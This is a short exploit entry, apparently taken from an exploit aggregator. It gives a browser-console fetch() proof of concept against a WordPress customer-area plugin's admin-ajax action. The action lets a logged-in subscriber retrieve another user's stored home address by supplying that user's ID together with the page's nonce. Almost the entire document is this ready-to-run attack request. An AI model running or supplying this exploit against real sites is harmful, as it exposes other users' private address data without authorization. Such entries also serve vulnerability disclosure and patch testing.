## https://sploitus.com/exploit?id=WPEX-ID:A224B984-770A-4534-B689-0701B582B388
Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/):
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
"method": "POST",
"mode": "cors",
"credentials": "include"
}).then((response) => {return response.text(); })
.then((data) => {
console.log(data);
});